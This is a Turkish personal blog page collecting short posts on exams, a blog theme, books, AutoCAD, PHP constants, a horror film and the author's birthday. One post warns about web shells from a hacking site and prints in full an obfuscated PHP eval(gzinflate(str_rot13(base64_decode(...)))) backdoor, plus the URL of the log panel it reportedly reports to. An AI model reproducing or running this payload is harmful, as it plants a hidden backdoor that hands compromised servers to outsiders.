[ana sayfa] [hakkımda] [arşiv] [iletişim]
Aktüalite etiketine sahip kayıtlar gösteriliyor. Tüm kayıtları göster
Aktüalite etiketine sahip kayıtlar gösteriliyor. Tüm kayıtları göster

0 AÖF Sınavlarını Çalışmadan Nasıl Geçtim

Önlisanstan mezun olduktan hemen sonra AÖF İşletme bölümüne dikey geçiş yaptım.Dikey geçiş sayesinde 3. sınıftan başladım fakat alttan birçok ders alarak tabi.

Güzel günler kısa sürdü ve nihayet 2014 - 2015 güz dönemi vize sınavları geldi çattı.Sınavlara 4 gün kala varlığından haberim oldu, tahmin edilebileceği gibi bu saatten sonra ne yapsam boştu :)

0 Temanın Son Hali

Yıllardır blog teması olarak Minima adlı bu temayı kullanıyorum.2004 yapımı çok sade ve ham bir tema.Temanın ilk haline baktığımda epey mutasyona uğrattığımı farkettim :)

Yaptığım şeyler belki ufak tefek ve piyasada bulunan şeyler ama doğru yere doğru dokunuş yapmak önemli.

Neler değişti & eklendi ?
  • Banner çok eski hangi kafayla ve ne zaman yaptığımı bilmiyorum :)
  • Başlıkları ve sağ yan menüleri CSS ile biraz şekillendirdim.Yazı başlıklarında kullandığım sarı renk bana pozitif enerji veriyor :)
  • Başlıkların kenarına mouse ile üstüne gelindiğinde mutlu olan suratlar iliştirdim.Anlatımı burada ( CSS Rollover ) Ha yorum sayılarını baloncuk içine de almışım :)
  • Sayfalama ve son yorumlar eklentisi ekledim.
  • Yazılarımdaki kodların görünebilirliği için Syntax Highlighter eklentisi kullanıyorum.
  • Blogger etiket listeleme sistemi tam bir fiyasko.Onu da elden geçirdim.Blogger Tag Cloud diye aratırsanız iyi birşeyler bulabilirsiniz.
Ve en son olarak da;

Dün sayfaya dinamiklik katacağını düşünerek Content Slider eklemeye karar verdim.Stabil ve sağlam birşey bulabilmek için dünden beri uğraşıyordum ki sonunda içime sinecek birşey buldum; Wowslider.com.Saolsunlar geliştirdikleri uygulama sayesinde kodla satırla pek uğraşmadan kolaylıkla siteme göre uygun birşey tasarlayıp kodları ve dosyaları aldım ve Google Drive 'a yükledim.İleride slider 'ın nasıl ekleneceği konusunda açıklayıcı bir yazı yazmayı düşünüyorum.

Şimdilik bu kadar hoşçakalın...

0 Suç ve Ceza - Dostoyevski

Bu kitabı okuduktan sonra bu zamana kadar hiçbir şeyin farkında olmamış olduğunuzu anlayacak ve şimdiye kadar okumamışsanız kendinizi bir şeylerden mahrum kalmış hissedeceksiniz...

Romanda hukuk öğrenimini maddi zorluklar nedeniyle yarıda bırakmak zorunda kalan bir öğrencinin adalet anlayışı ele alınıyor...Toplum için bir çıban olarak gördüğü yaşlı tefeci kadını ve tek suçu o anda orada bulunmak olan yaşlı kadının üvey kardeşini baltayla öldüren baş karakter Raskolnikov, şimdiye kadar adım atamadığınız uçsuz bucaksız yollara sizi sokup, kendiyle beraber size de kafayı yedirtecek.

1 Son Okuduklarım...

Okul dışında yapacak pek birşeyimin olmayışından dolayı kendime güzel bir uğraş bulduğumu düşünüyorum...Allah bozmasın bu aralar tam bir kitapkurdu oldum desem yalan olmaz heralde :)

Son okuduğum kitaplardan kısaca bahsedecek olursam :

0 AutoCad Maceraları

Okuduğum bölüm gereği şu sıralar baya baya içli dışlı olduğum bir program oldu AutoCad.Programı ilk açtığımda içerisinde kaybolacak gibi hissetsemde artık bu korkumu yavaş yavaş yendim sayılır.

Çevremde AutoCad geçmişi olanlardan duyduklarım genelde ağız birliği etmişlercesine hep aynı "Bizim zamanımızda bu kadar görsellik yoktu her şeyi kod ile yapardık...Çok değişmiş çok!" laflarını duydukça biraz bozuluyorum açıkçası insan kendini bir şeylere geç kalmış, geri kalmış hissediyor.

Bir şeyi öğrenme aşamasındaysam iyi midir kötü müdür aşırı bir şekilde not tutma gereksinimi duyarım.Hani söz uçar yazı kalır derler ya, ben o sözün hakkını veren dünyadaki son insanım sanırım :) Okul derslerinin aksine dijital ortamda öğrenilecek bir şey olduğun blogu AutoCad günlüğüne çevirmek bana epey mantıklı geldi.Dediğim gibi bu işe biraz geç kalmış yeni yetme biri olarak AutoCad 2013 'ten başlayacağım...

Bir sonraki yazıda görüşmek üzere...

0 Adam Fawer - Olasılıksız

O kadar kitap kurdu biri değilimdir, şimdiye kadar okuduğum kitaplar sizin anlayacağınız bir elin parmaklarını geçmez.

Bu kitabı üniversiteden bir arkadaşım hediye etti :) sıkıntıdan patlamak üzere olduğum bir anda elime aldım ve okumaya başladım okudum, okudum, okudum...Öncelikle yazarın kalemi harbi çok sağlam, güçlü bilgi birikimiyle yazılmış bir kitap sanki okumuyor, yaşıyorsunuz...film gibi yani! Kitabın bazı bölümlerini anlamak için biraz teknik bilgi sahibi olmanız gerekiyor, o yüzden bazı paragrafları anlamak için iki kere okumanız ve tanım aramak için internet gerekebilir :)

Kitabı sabah 5:30 gibi bitirdim artık nasıl bağlayyıcı birşey olduğunun hesabını siz yapın...

0 Sabah 04:57

Sağ alt köşedeki nefret ettiğim zamana baktığımda tam olarak da başlıkda belirttiğim saatte bu gereksiz yazıya koyuluyorum.Bu yazıyı tam olarak neden yazdığımı bilememekle beraber haliyle bi amacımın olduğuda söylenemez...Şu anda dışarıda yağan felaket yağmurdanmıdır nedir içimi sebepsiz bi yazma eylemi sardı.Saat 12 den bu yana yerli yersiz derin şeyler düşünüyorum içimdeki maneviyatsızlığın sebebi ne olabilir acaba diye...

0 PHP Sabitleri

Tam olarak nerede kalmıştık bilmiyorum fakat bu gece birşeyler karalamak istiyorum finish'i nerde çekeriz bilmiyorum :) Let'S go..!

PHP'de sabitler normal değişkenlere göre farklı bir şekilde kullanılır bu fark sabitlerin bir kere tanımlandıkları anda script içerisinde bir daha farklı değer almama şartlarıdır...Örneğin;

<?php
$var = 'elma';
echo $var; // elma yazacaktır...

$var = 'armut';
echo $var; // armut yazacaktır...

?> 

Görüldüğü gibi $var adlı değişkenin değerini bir alt satırda elmadan armuta değiştirdik.Fakat $var değişkenini sabitleseydik böyle bir kullanım söz konusu olmayacaktı.Bu yüzden sabitler değişkenlere göre daha güvenlidir.Özellikle RFI açıklarını kapama konusunda ;)

Sabit tanımlamaya örnek bir kod blogu yazıyorum;

<?php
define ('yazar','UsluBey');
echo defined('yazar'); // defined() sabit tanımlandımı? tanımlıysa 1 yazacaktır
echo yazar; // ekrana UsluBey basacak
?>

Yukarıda sabit tanımlamayı gösterdim şimdide bir kez değer tanımlanan sabite birden fazla değer vermeye çalışalım...

<?php
define ('var','elma');
echo var;
define ('var','armut');
echo var;
?>

Yukarıdaki kodları çalıştırdığınızda 'PHP Parse error: syntax error, unexpected T_VAR...gibi bir hata alacaksınız çünkü dediğim gibi bir sabit birden fazla değer almaz yani bir kemik aynı yerden 2 defa kırılmaz gibi bişey =)

Bunların yanında PHP'de öntanımlı olarak 7 adet Magic Constant yani Sihirli Sabit mevcuttur onlarıda buradan inceleyebilirisiniz...

2 PARANORMAL ACTIVITY 2 : Trailer

Normalde korku filmlerinde insanları korkutmak, germek için yaratık, cinayet, kan, vahşet vs. gibi noktalar üstüne basa basa vurgulanır fakat bu filmde ilk baktığımda alışılmış korku filmlerinin aksine korku efektlerinin azlığı, görüntü kalitesizliği veya hareket azlığı bende bir önyargı oluşmasına sebep olmuştu fakat izlemeye devam edince sizde başka bir bakış açısı yaratıyor her an birşeyle karşılaşmanın tetikliği ve gerginliği yetip artıyor, bir o kadar doğal olmasıda ayrı bir ürpertici güzellik :)

İlk filmini gecenin bir yarısı karanlık odamda tek başıma izlemek gibi bir hataya düşmüştüm :) fakat 2. filminde de aynı hataya düşmeye hayır diyemem açıkçası :)

4 Tarafsız Hack Haber SiberBülten!

Merhaba sevgili blog ve sevgili okurlarım...

Pek işim olmaz ya arada heyk aleminde neler dönüyor kim kimi heykliyor kim kime kayıyor zaman öldürmek maksadıyla şöyle bir göz atıyorum...Bu akşam Siberbülten.net'e baktığımda "Thepoison.org (Shell Center) Online !" başlıklı bir haber gördüm yinemi hack sitesi diye habere tıkladım...Şunları yazmışlar;

Thepoison.org Shell Sitesi Online !

Entcounix önderliğinde içeriğinde bir çok shell barındıran Thepoison.org hizmete girmiştir. Logsuz oldugunu belirten ekip eğitim amaçlı çalısmalarında oldugunu belirttiler

İletişim: security@crack-h.com


Shellere baktığımda bütün shellerin altında bu kod yer alıyordu:

<?php eval(gzinflate(str_rot13(base64_decode('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')))); ?>

Piyasadaki diğer mallara göre biraz farklı bi şifreleme seçmişler :D ama kırmak hiçde zor değil...İşte decode edilmiş hali;


Buda loglara giriş panelleri:

http://attack-h.com/snf/log.php

Bu yazının aynısını siberbülten'e yorum olarak gönderdim tabiki farkettikleri gibi yorumu sildiler :D çünkü sitelerindeki gıydırık banner'da da yer aldığı gibi tarafsız değil TARAFLI haberden yanalar...

Bu tür loglu shell'ler hatta sırf bunun için açılan siteler sanalın en alt tabakasını oluşturan aciz insanların ürünüdür...

Neyse bunlar için bu kadar yazmak yeterde artar bile...Dikkatli olun böyle salaklara malzeme olmayın iyi akşamlar!

2 Mutlu Yıllar Bana

Hatırladımda bugün benim doğum günümdü yani 3 kasım...Bunları yazarken gün 4 kasım saat 01:06 yani işten geleli 36 dakika olmuş...

Yine yalnız geçen, unutulmuş bi gündü geldi geçti işte.Lise yıllarımı düşünüyorumda yine doğum günümü kimse hatırlamazdı, aslında kimse doğum günümü bilmiyordu.İtiraf ediyorum kendimden başka herkesin doğum gününü kutlamaya özen gösterirdim, kutladıklarım belki bir sürpriz yaparda benide hatırlarlar diye belkide bencilce bi davranış ama naparsın işte insanoğlu hatırlanmak, önem verilmek istiyor...

Her neyse lafgelimi nice mutlu yıllara diyelim fikir Hımmm...Sanırım bişeyler dilemem gerekiyor? Öyleyse mutluluğu ve parası bol olan yıllar istiyorum nerd

0 Merhaba Dünya v2.0

Merhaba herkesin bir blogu olduğu şu günlerde benide blog merakı iyice sardı en sonunda Blogspot'tan bende bir blog açtım.Evet şimdi boş olabilir ama ileride daha güzel olacağına inanıyorum :)
Sevgilerle...